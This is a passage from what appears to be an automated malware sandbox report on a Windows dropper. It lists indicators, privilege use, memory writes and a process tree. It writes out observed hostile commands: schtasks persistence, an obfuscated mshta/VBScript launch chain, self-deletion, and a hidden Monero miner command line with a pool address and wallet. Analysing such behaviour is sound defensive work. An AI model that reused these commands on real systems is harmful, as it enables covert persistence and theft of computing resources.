86b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e	Mon11c710f55e48b36.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 1900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491d00000001000000100000002e0d6875874a44c820912e85e964cfdb140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b40b00000001000000180000004300b7004f00b7004d00b7004f00b7004400b7004f00000053000000010000002600000030243022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703080f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e	Mon11c710f55e48b36.exe

Script User-Agent 1 IoCs
Uses user-agent string associated with script host/environment.

Processes:

description flow ioc

HTTP User-Agent header 86 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
Suspicious behavior: CmdExeWriteProcessMemorySpam 2 IoCs

Processes:

gcleaner.exeautosubplayer.exe

pid process

1776 gcleaner.exe
3868 autosubplayer.exe

description	flow	ioc
HTTP User-Agent header	86	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)

pid	process
1776	gcleaner.exe
3868	autosubplayer.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

Mon1160373b3b6ac3f.exeMon117107f765b140f6f.exepowershell.exeWerFault.exe6496633.scr

pid	process
836	Mon1160373b3b6ac3f.exe
2040	Mon117107f765b140f6f.exe
2040	Mon117107f765b140f6f.exe
1844	powershell.exe
1268
1268
1268
1268
1268
1268
1268
1268
1268
1268
2380	WerFault.exe
2380	WerFault.exe
2380	WerFault.exe
2380	WerFault.exe
2380	WerFault.exe
2380	WerFault.exe
2380	WerFault.exe
1268
1268
1268
1268
1268
1268
1268
1268
1268
1268
1268
1268
1268
1268
1268
1268
1268
2952	6496633.scr
1268
1268
1268
1268
1268
1268
1268
1268
1268
1268
1268
1268
1268
1268
1268
1268
1268
1268
1268
1268
1268
1268
1268
1268
1268

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

Processes:

pid process

1268
Suspicious behavior: MapViewOfSection 1 IoCs

Processes:

Mon117107f765b140f6f.exe

pid process

2040 Mon117107f765b140f6f.exe

pid	process
1268

pid	process
2040	Mon117107f765b140f6f.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

Mon11bddd2ee4744bdc.exeMon114596ddbd42f8.exeMon11c710f55e48b36.exeMon11cce54fe7cc83fa3.exepowershell.exetaskkill.exe1133274.scrWerFault.exeMon1160373b3b6ac3f.exePublicDwlBrowser1100.exe3467698.scr7771480.scr6496633.scrWerFault.exeBearVpn 3.exe2580827.exe3467698.scr7741122.scr7058254.scrudptest.exe

description	pid	process
Token: SeCreateTokenPrivilege	1008	Mon11bddd2ee4744bdc.exe
Token: SeAssignPrimaryTokenPrivilege	1008	Mon11bddd2ee4744bdc.exe
Token: SeLockMemoryPrivilege	1008	Mon11bddd2ee4744bdc.exe
Token: SeIncreaseQuotaPrivilege	1008	Mon11bddd2ee4744bdc.exe
Token: SeMachineAccountPrivilege	1008	Mon11bddd2ee4744bdc.exe
Token: SeTcbPrivilege	1008	Mon11bddd2ee4744bdc.exe
Token: SeSecurityPrivilege	1008	Mon11bddd2ee4744bdc.exe
Token: SeTakeOwnershipPrivilege	1008	Mon11bddd2ee4744bdc.exe
Token: SeLoadDriverPrivilege	1008	Mon11bddd2ee4744bdc.exe
Token: SeSystemProfilePrivilege	1008	Mon11bddd2ee4744bdc.exe
Token: SeSystemtimePrivilege	1008	Mon11bddd2ee4744bdc.exe
Token: SeProfSingleProcessPrivilege	1008	Mon11bddd2ee4744bdc.exe
Token: SeIncBasePriorityPrivilege	1008	Mon11bddd2ee4744bdc.exe
Token: SeCreatePagefilePrivilege	1008	Mon11bddd2ee4744bdc.exe
Token: SeCreatePermanentPrivilege	1008	Mon11bddd2ee4744bdc.exe
Token: SeBackupPrivilege	1008	Mon11bddd2ee4744bdc.exe
Token: SeRestorePrivilege	1008	Mon11bddd2ee4744bdc.exe
Token: SeShutdownPrivilege	1008	Mon11bddd2ee4744bdc.exe
Token: SeDebugPrivilege	1008	Mon11bddd2ee4744bdc.exe
Token: SeAuditPrivilege	1008	Mon11bddd2ee4744bdc.exe
Token: SeSystemEnvironmentPrivilege	1008	Mon11bddd2ee4744bdc.exe
Token: SeChangeNotifyPrivilege	1008	Mon11bddd2ee4744bdc.exe
Token: SeRemoteShutdownPrivilege	1008	Mon11bddd2ee4744bdc.exe
Token: SeUndockPrivilege	1008	Mon11bddd2ee4744bdc.exe
Token: SeSyncAgentPrivilege	1008	Mon11bddd2ee4744bdc.exe
Token: SeEnableDelegationPrivilege	1008	Mon11bddd2ee4744bdc.exe
Token: SeManageVolumePrivilege	1008	Mon11bddd2ee4744bdc.exe
Token: SeImpersonatePrivilege	1008	Mon11bddd2ee4744bdc.exe
Token: SeCreateGlobalPrivilege	1008	Mon11bddd2ee4744bdc.exe
Token: 31	1008	Mon11bddd2ee4744bdc.exe
Token: 32	1008	Mon11bddd2ee4744bdc.exe
Token: 33	1008	Mon11bddd2ee4744bdc.exe
Token: 34	1008	Mon11bddd2ee4744bdc.exe
Token: 35	1008	Mon11bddd2ee4744bdc.exe
Token: SeDebugPrivilege	584	Mon114596ddbd42f8.exe
Token: SeDebugPrivilege	1748	Mon11c710f55e48b36.exe
Token: SeDebugPrivilege	1692	Mon11cce54fe7cc83fa3.exe
Token: SeDebugPrivilege	1844	powershell.exe
Token: SeShutdownPrivilege	1268
Token: SeShutdownPrivilege	1268
Token: SeDebugPrivilege	2412	taskkill.exe
Token: SeDebugPrivilege	2396	1133274.scr
Token: SeDebugPrivilege	2380	WerFault.exe
Token: SeDebugPrivilege	836	Mon1160373b3b6ac3f.exe
Token: SeDebugPrivilege	2688	PublicDwlBrowser1100.exe
Token: SeShutdownPrivilege	1268
Token: SeShutdownPrivilege	1268
Token: SeShutdownPrivilege	1268
Token: SeDebugPrivilege	3004	3467698.scr
Token: SeDebugPrivilege	2548	7771480.scr
Token: SeShutdownPrivilege	1268
Token: SeShutdownPrivilege	1268
Token: SeDebugPrivilege	2952	6496633.scr
Token: SeDebugPrivilege	1696	WerFault.exe
Token: SeDebugPrivilege	2092	BearVpn 3.exe
Token: SeDebugPrivilege	2764	2580827.exe
Token: SeDebugPrivilege	1220	3467698.scr
Token: SeDebugPrivilege	2124	7741122.scr
Token: SeDebugPrivilege	2620	7058254.scr
Token: SeDebugPrivilege	2872	udptest.exe
Token: SeShutdownPrivilege	1268
Token: SeShutdownPrivilege	1268
Token: SeShutdownPrivilege	1268
Token: SeShutdownPrivilege	1268

Suspicious use of FindShellTrayWindow 5 IoCs

Processes:

ultramediaburner.tmp

pid process

1268
1268
1268
1268
2028 ultramediaburner.tmp
Suspicious use of SendNotifyMessage 16 IoCs

Processes:

pid process

1268
1268
1268
1268
1268
1268
1268
1268
1268
1268
1268
1268
1268
1268
1268
1268
Suspicious use of SetWindowsHookEx 2 IoCs

Processes:

iexplore.exe

pid process

3596 iexplore.exe
3596 iexplore.exe

pid	process
1268
1268
1268
1268
2028	ultramediaburner.tmp

pid	process
1268
1268
1268
1268
1268
1268
1268
1268
1268
1268
1268
1268
1268
1268
1268
1268

pid	process
3596	iexplore.exe
3596	iexplore.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

295b842a1a8473e51468fed24d1527cd.exesetup_install.execmd.execmd.exe

description	pid	process	target process
PID 1224 wrote to memory of 1672	1224	295b842a1a8473e51468fed24d1527cd.exe	setup_install.exe
PID 1224 wrote to memory of 1672	1224	295b842a1a8473e51468fed24d1527cd.exe	setup_install.exe
PID 1224 wrote to memory of 1672	1224	295b842a1a8473e51468fed24d1527cd.exe	setup_install.exe
PID 1224 wrote to memory of 1672	1224	295b842a1a8473e51468fed24d1527cd.exe	setup_install.exe
PID 1224 wrote to memory of 1672	1224	295b842a1a8473e51468fed24d1527cd.exe	setup_install.exe
PID 1224 wrote to memory of 1672	1224	295b842a1a8473e51468fed24d1527cd.exe	setup_install.exe
PID 1224 wrote to memory of 1672	1224	295b842a1a8473e51468fed24d1527cd.exe	setup_install.exe
PID 1672 wrote to memory of 1220	1672	setup_install.exe	cmd.exe
PID 1672 wrote to memory of 1220	1672	setup_install.exe	cmd.exe
PID 1672 wrote to memory of 1220	1672	setup_install.exe	cmd.exe
PID 1672 wrote to memory of 1220	1672	setup_install.exe	cmd.exe
PID 1672 wrote to memory of 1220	1672	setup_install.exe	cmd.exe
PID 1672 wrote to memory of 1220	1672	setup_install.exe	cmd.exe
PID 1672 wrote to memory of 1220	1672	setup_install.exe	cmd.exe
PID 1672 wrote to memory of 592	1672	setup_install.exe	cmd.exe
PID 1672 wrote to memory of 592	1672	setup_install.exe	cmd.exe
PID 1672 wrote to memory of 592	1672	setup_install.exe	cmd.exe
PID 1672 wrote to memory of 592	1672	setup_install.exe	cmd.exe
PID 1672 wrote to memory of 592	1672	setup_install.exe	cmd.exe
PID 1672 wrote to memory of 592	1672	setup_install.exe	cmd.exe
PID 1672 wrote to memory of 592	1672	setup_install.exe	cmd.exe
PID 1672 wrote to memory of 472	1672	setup_install.exe	cmd.exe
PID 1672 wrote to memory of 472	1672	setup_install.exe	cmd.exe
PID 1672 wrote to memory of 472	1672	setup_install.exe	cmd.exe
PID 1672 wrote to memory of 472	1672	setup_install.exe	cmd.exe
PID 1672 wrote to memory of 472	1672	setup_install.exe	cmd.exe
PID 1672 wrote to memory of 472	1672	setup_install.exe	cmd.exe
PID 1672 wrote to memory of 472	1672	setup_install.exe	cmd.exe
PID 1672 wrote to memory of 576	1672	setup_install.exe	cmd.exe
PID 1672 wrote to memory of 576	1672	setup_install.exe	cmd.exe
PID 1672 wrote to memory of 576	1672	setup_install.exe	cmd.exe
PID 1672 wrote to memory of 576	1672	setup_install.exe	cmd.exe
PID 1672 wrote to memory of 576	1672	setup_install.exe	cmd.exe
PID 1672 wrote to memory of 576	1672	setup_install.exe	cmd.exe
PID 1672 wrote to memory of 576	1672	setup_install.exe	cmd.exe
PID 1672 wrote to memory of 656	1672	setup_install.exe	cmd.exe
PID 1672 wrote to memory of 656	1672	setup_install.exe	cmd.exe
PID 1672 wrote to memory of 656	1672	setup_install.exe	cmd.exe
PID 1672 wrote to memory of 656	1672	setup_install.exe	cmd.exe
PID 1672 wrote to memory of 656	1672	setup_install.exe	cmd.exe
PID 1672 wrote to memory of 656	1672	setup_install.exe	cmd.exe
PID 1672 wrote to memory of 656	1672	setup_install.exe	cmd.exe
PID 592 wrote to memory of 1692	592	cmd.exe	Mon11cce54fe7cc83fa3.exe
PID 592 wrote to memory of 1692	592	cmd.exe	Mon11cce54fe7cc83fa3.exe
PID 592 wrote to memory of 1692	592	cmd.exe	Mon11cce54fe7cc83fa3.exe
PID 592 wrote to memory of 1692	592	cmd.exe	Mon11cce54fe7cc83fa3.exe
PID 1672 wrote to memory of 1472	1672	setup_install.exe	cmd.exe
PID 1672 wrote to memory of 1472	1672	setup_install.exe	cmd.exe
PID 1672 wrote to memory of 1472	1672	setup_install.exe	cmd.exe
PID 1672 wrote to memory of 1472	1672	setup_install.exe	cmd.exe
PID 1672 wrote to memory of 1472	1672	setup_install.exe	cmd.exe
PID 1672 wrote to memory of 1472	1672	setup_install.exe	cmd.exe
PID 1672 wrote to memory of 1472	1672	setup_install.exe	cmd.exe
PID 1672 wrote to memory of 840	1672	setup_install.exe	cmd.exe
PID 1672 wrote to memory of 840	1672	setup_install.exe	cmd.exe
PID 1672 wrote to memory of 840	1672	setup_install.exe	cmd.exe
PID 1672 wrote to memory of 840	1672	setup_install.exe	cmd.exe
PID 1672 wrote to memory of 840	1672	setup_install.exe	cmd.exe
PID 1672 wrote to memory of 840	1672	setup_install.exe	cmd.exe
PID 1672 wrote to memory of 840	1672	setup_install.exe	cmd.exe
PID 1220 wrote to memory of 1844	1220	cmd.exe	powershell.exe
PID 1220 wrote to memory of 1844	1220	cmd.exe	powershell.exe
PID 1220 wrote to memory of 1844	1220	cmd.exe	powershell.exe
PID 1220 wrote to memory of 1844	1220	cmd.exe	powershell.exe

C:\Users\Admin\AppData\Local\Temp\295b842a1a8473e51468fed24d1527cd.exe
"C:\Users\Admin\AppData\Local\Temp\295b842a1a8473e51468fed24d1527cd.exe"
1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1224

C:\Users\Admin\AppData\Local\Temp\7zS8C476BB2\setup_install.exe
"C:\Users\Admin\AppData\Local\Temp\7zS8C476BB2\setup_install.exe"
2⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1672

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Mon1160373b3b6ac3f.exe
3⤵
- Loads dropped DLL
PID:616

C:\Users\Admin\AppData\Local\Temp\7zS8C476BB2\Mon1160373b3b6ac3f.exe
Mon1160373b3b6ac3f.exe
4⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Loads dropped DLL
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:836

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Mon11c710f55e48b36.exe
3⤵
- Loads dropped DLL
PID:912

C:\Users\Admin\AppData\Local\Temp\7zS8C476BB2\Mon11c710f55e48b36.exe
Mon11c710f55e48b36.exe
4⤵
- Executes dropped EXE
- Modifies system certificate store
- Suspicious use of AdjustPrivilegeToken
PID:1748

C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe
"C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"
5⤵
- Executes dropped EXE
- Loads dropped DLL
PID:2536

C:\Users\Admin\AppData\Local\Temp\Chrome 5.exe
"C:\Users\Admin\AppData\Local\Temp\Chrome 5.exe"
6⤵
- Executes dropped EXE
PID:2672

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit
7⤵
PID:1756

C:\Windows\system32\schtasks.exe
schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'
8⤵
- Creates scheduled task(s)
PID:3612

C:\Users\Admin\AppData\Roaming\services64.exe
"C:\Users\Admin\AppData\Roaming\services64.exe"
7⤵
- Executes dropped EXE
PID:3972

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit
8⤵
PID:1764

C:\Windows\system32\schtasks.exe
schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'
9⤵
- Creates scheduled task(s)
PID:1772

C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe
"C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"
8⤵
PID:2852

C:\Windows\explorer.exe
C:\Windows\explorer.exe --cinit-find-x -B --algo=rx/0 --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr-eu2.nanopool.org:14433 --user=41o1Bi5waqLgbkV653RD7zSYeXSWRu1wnEDzPgFDFwntSnuRx7g4HbHPqNDGS6BW1bget6yyHyrPbBcVsdR6Ebxd843bMuK.add/password --pass= --cpu-max-threads-hint=30 --cinit-remote-config="v4Qq47ngFyBcSyO2uLKc6O4DG/ZgkwoY7/pmBv4ks3wJ7PR9JPsLklOJLkitFc6Y" --cinit-idle-wait=5 --cinit-idle-cpu=70 --tls --cinit-stealth
8⤵
PID:2252

C:\Users\Admin\AppData\Local\Temp\PublicDwlBrowser1100.exe
"C:\Users\Admin\AppData\Local\Temp\PublicDwlBrowser1100.exe"
6⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:2688

C:\ProgramData\2580827.exe
"C:\ProgramData\2580827.exe"
7⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:2764

C:\ProgramData\4074099.exe
"C:\ProgramData\4074099.exe"
7⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:3624

C:\ProgramData\7514614.exe
"C:\ProgramData\7514614.exe"
7⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:2584

C:\ProgramData\7514614.exe
"C:\ProgramData\7514614.exe"
8⤵
PID:3472

C:\ProgramData\7514614.exe
"C:\ProgramData\7514614.exe"
8⤵
- Executes dropped EXE
PID:3340

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2584 -s 720
8⤵
- Program crash
PID:2632

C:\ProgramData\3628899.exe
"C:\ProgramData\3628899.exe"
7⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:472

C:\ProgramData\4895843.exe
"C:\ProgramData\4895843.exe"
7⤵
- Executes dropped EXE
PID:2472

C:\Users\Admin\AppData\Local\Temp\setup.exe
"C:\Users\Admin\AppData\Local\Temp\setup.exe"
6⤵
- Executes dropped EXE
PID:2804

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c start /I "" "C:\Users\Admin\AppData\Local\Temp\{H6IX-IDxO4-XENT-j4pwm}\79923107550.exe"
7⤵
PID:3324

C:\Users\Admin\AppData\Local\Temp\{H6IX-IDxO4-XENT-j4pwm}\79923107550.exe
"C:\Users\Admin\AppData\Local\Temp\{H6IX-IDxO4-XENT-j4pwm}\79923107550.exe"
8⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:3528

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c start /I "" "C:\Users\Admin\AppData\Local\Temp\{H6IX-IDxO4-XENT-j4pwm}\42898339440.exe" /mix
7⤵
PID:3640

C:\Users\Admin\AppData\Local\Temp\{H6IX-IDxO4-XENT-j4pwm}\42898339440.exe
"C:\Users\Admin\AppData\Local\Temp\{H6IX-IDxO4-XENT-j4pwm}\42898339440.exe" /mix
8⤵
- Executes dropped EXE
- Checks processor information in registry
PID:3808

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c rd /s /q C:\Users\Admin\AppData\Local\Temp\aRfeZcmTfLo & timeout 4 & del /f /q "C:\Users\Admin\AppData\Local\Temp\{H6IX-IDxO4-XENT-j4pwm}\42898339440.exe"
9⤵
PID:3500

C:\Windows\SysWOW64\timeout.exe
timeout 4
10⤵
- Delays execution with timeout.exe
PID:2768

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c start /I "" "C:\Users\Admin\AppData\Local\Temp\{H6IX-IDxO4-XENT-j4pwm}\02394736184.exe" /mix
7⤵
PID:3148

C:\Users\Admin\AppData\Local\Temp\{H6IX-IDxO4-XENT-j4pwm}\02394736184.exe
"C:\Users\Admin\AppData\Local\Temp\{H6IX-IDxO4-XENT-j4pwm}\02394736184.exe" /mix
8⤵
- Executes dropped EXE
PID:1348

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c taskkill /im "setup.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\setup.exe" & exit
7⤵
PID:3396

C:\Windows\SysWOW64\taskkill.exe
taskkill /im "setup.exe" /f
8⤵
- Kills process with taskkill
PID:1904

C:\Users\Admin\AppData\Local\Temp\udptest.exe
"C:\Users\Admin\AppData\Local\Temp\udptest.exe"
6⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of AdjustPrivilegeToken
PID:2872

C:\Users\Admin\AppData\Local\Temp\sfx_123_206.exe
"C:\Users\Admin\AppData\Local\Temp\sfx_123_206.exe"
6⤵
- Executes dropped EXE
- Loads dropped DLL
PID:2960

C:\Windows\SysWOW64\mshta.exe
"C:\Windows\System32\mshta.exe" VbsCRIPT:CLOSe( CREateoBJect ( "wsCRIPT.sHEll" ).RUn( "CMd.ExE /C TYPE ""C:\Users\Admin\AppData\Local\Temp\sfx_123_206.exe"" > BQRDoAPXV.eXe && STArT bQRdOAPXV.exE -pOMw61vdx0wkZa3aN &if """" == """" for %I In (""C:\Users\Admin\AppData\Local\Temp\sfx_123_206.exe"" ) do taskkill /F /IM ""%~nxI"" " , 0 , tRUe) )
7⤵
PID:2968

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C TYPE "C:\Users\Admin\AppData\Local\Temp\sfx_123_206.exe" > BQRDoAPXV.eXe && STArT bQRdOAPXV.exE -pOMw61vdx0wkZa3aN &if "" =="" for %I In ("C:\Users\Admin\AppData\Local\Temp\sfx_123_206.exe" ) do taskkill /F /IM "%~nxI"
8⤵
PID:3296

C:\Users\Admin\AppData\Local\Temp\BQRDoAPXV.eXe
bQRdOAPXV.exE -pOMw61vdx0wkZa3aN
9⤵
- Executes dropped EXE
PID:3456

C:\Windows\SysWOW64\mshta.exe
"C:\Windows\System32\mshta.exe" VbsCRIPT:CLOSe( CREateoBJect ( "wsCRIPT.sHEll" ).RUn( "CMd.ExE /C TYPE ""C:\Users\Admin\AppData\Local\Temp\BQRDoAPXV.eXe"" > BQRDoAPXV.eXe && STArT bQRdOAPXV.exE -pOMw61vdx0wkZa3aN &if ""-pOMw61vdx0wkZa3aN "" == """" for %I In (""C:\Users\Admin\AppData\Local\Temp\BQRDoAPXV.eXe"" ) do taskkill /F /IM ""%~nxI"" " , 0 , tRUe) )
10⤵
PID:3684

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C TYPE "C:\Users\Admin\AppData\Local\Temp\BQRDoAPXV.eXe" > BQRDoAPXV.eXe && STArT bQRdOAPXV.exE -pOMw61vdx0wkZa3aN &if "-pOMw61vdx0wkZa3aN " =="" for %I In ("C:\Users\Admin\AppData\Local\Temp\BQRDoAPXV.eXe" ) do taskkill /F /IM "%~nxI"
11⤵
PID:4012

C:\Windows\SysWOW64\rundll32.exe
"C:\Windows\System32\rundll32.exe" .\wa3n.AE,EkAXs
10⤵
PID:3588

C:\Windows\SysWOW64\taskkill.exe
taskkill /F /IM "sfx_123_206.exe"
9⤵
- Kills process with taskkill
PID:3492

C:\Users\Admin\AppData\Local\Temp\LivelyScreenRecorderF20.exe
"C:\Users\Admin\AppData\Local\Temp\LivelyScreenRecorderF20.exe"
6⤵
- Executes dropped EXE
PID:1400

C:\Users\Admin\AppData\Local\Temp\setup_2.exe
"C:\Users\Admin\AppData\Local\Temp\setup_2.exe"
6⤵
- Executes dropped EXE
PID:2420

C:\Users\Admin\AppData\Local\Temp\is-AS5E8.tmp\setup_2.tmp
"C:\Users\Admin\AppData\Local\Temp\is-AS5E8.tmp\setup_2.tmp" /SL5="$10250,140785,56832,C:\Users\Admin\AppData\Local\Temp\setup_2.exe"
7⤵
- Executes dropped EXE
PID:2816

C:\Users\Admin\AppData\Local\Temp\setup_2.exe
"C:\Users\Admin\AppData\Local\Temp\setup_2.exe" /SILENT
8⤵
- Executes dropped EXE
PID:1568

C:\Users\Admin\AppData\Local\Temp\is-M2K1B.tmp\setup_2.tmp
"C:\Users\Admin\AppData\Local\Temp\is-M2K1B.tmp\setup_2.tmp" /SL5="$20260,140785,56832,C:\Users\Admin\AppData\Local\Temp\setup_2.exe" /SILENT
9⤵
- Executes dropped EXE
PID:2880

C:\Users\Admin\AppData\Local\Temp\jhuuee.exe
"C:\Users\Admin\AppData\Local\Temp\jhuuee.exe"
6⤵
- Executes dropped EXE
PID:1668

C:\Users\Admin\AppData\Local\Temp\3002.exe
"C:\Users\Admin\AppData\Local\Temp\3002.exe"
6⤵
- Executes dropped EXE
PID:2696

C:\Users\Admin\AppData\Local\Temp\3002.exe
"C:\Users\Admin\AppData\Local\Temp\3002.exe" -a
7⤵
PID:2472

C:\Users\Admin\AppData\Local\Temp\BearVpn 3.exe
"C:\Users\Admin\AppData\Local\Temp\BearVpn 3.exe"
6⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:2092

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Mon117107f765b140f6f.exe
3⤵
- Loads dropped DLL
PID:1208

C:\Users\Admin\AppData\Local\Temp\7zS8C476BB2\Mon117107f765b140f6f.exe
Mon117107f765b140f6f.exe
4⤵
- Executes dropped EXE
- Loads dropped DLL
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
PID:2040

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Mon1133139d83b18.exe
3⤵
- Loads dropped DLL
PID:1160

C:\Users\Admin\AppData\Local\Temp\7zS8C476BB2\Mon1133139d83b18.exe
Mon1133139d83b18.exe
4⤵
- Executes dropped EXE
- Checks computer location settings
- Loads dropped DLL
PID:596

C:\Users\Admin\Documents\MyGPzkAlybv2a6x_Vs3BMPlz.exe
"C:\Users\Admin\Documents\MyGPzkAlybv2a6x_Vs3BMPlz.exe"
5⤵
- Executes dropped EXE
PID:3320

C:\Users\Admin\Documents\JmNebXd5625jZ82jf5xNnkvo.exe
"C:\Users\Admin\Documents\JmNebXd5625jZ82jf5xNnkvo.exe"
5⤵
PID:3328

C:\Users\Admin\Documents\t_mMOA6y6s9AfCcNoplevGJh.exe
"C:\Users\Admin\Documents\t_mMOA6y6s9AfCcNoplevGJh.exe"
5⤵
- Executes dropped EXE
PID:3920

C:\Windows\SysWOW64\cmd.exe
cmd.exe /c taskkill /f /im chrome.exe
6⤵
PID:3816

C:\Users\Admin\Documents\p7ft2Ix47hOCeLBku5FSHb_g.exe
"C:\Users\Admin\Documents\p7ft2Ix47hOCeLBku5FSHb_g.exe"
5⤵
PID:2040

C:\Users\Admin\Documents\BJaKOhzWIymHeSv6ZTDFqpCZ.exe
"C:\Users\Admin\Documents\BJaKOhzWIymHeSv6ZTDFqpCZ.exe"
5⤵
PID:3568

C:\Users\Admin\Documents\qT3dWYBP7ZsuOrwW4ZcUbjl6.exe
"C:\Users\Admin\Documents\qT3dWYBP7ZsuOrwW4ZcUbjl6.exe"
6⤵
PID:3620

C:\Windows\SysWOW64\schtasks.exe
schtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl HR" /sc HOURLY /rl HIGHEST
6⤵
- Creates scheduled task(s)
PID:3452

C:\Windows\SysWOW64\schtasks.exe
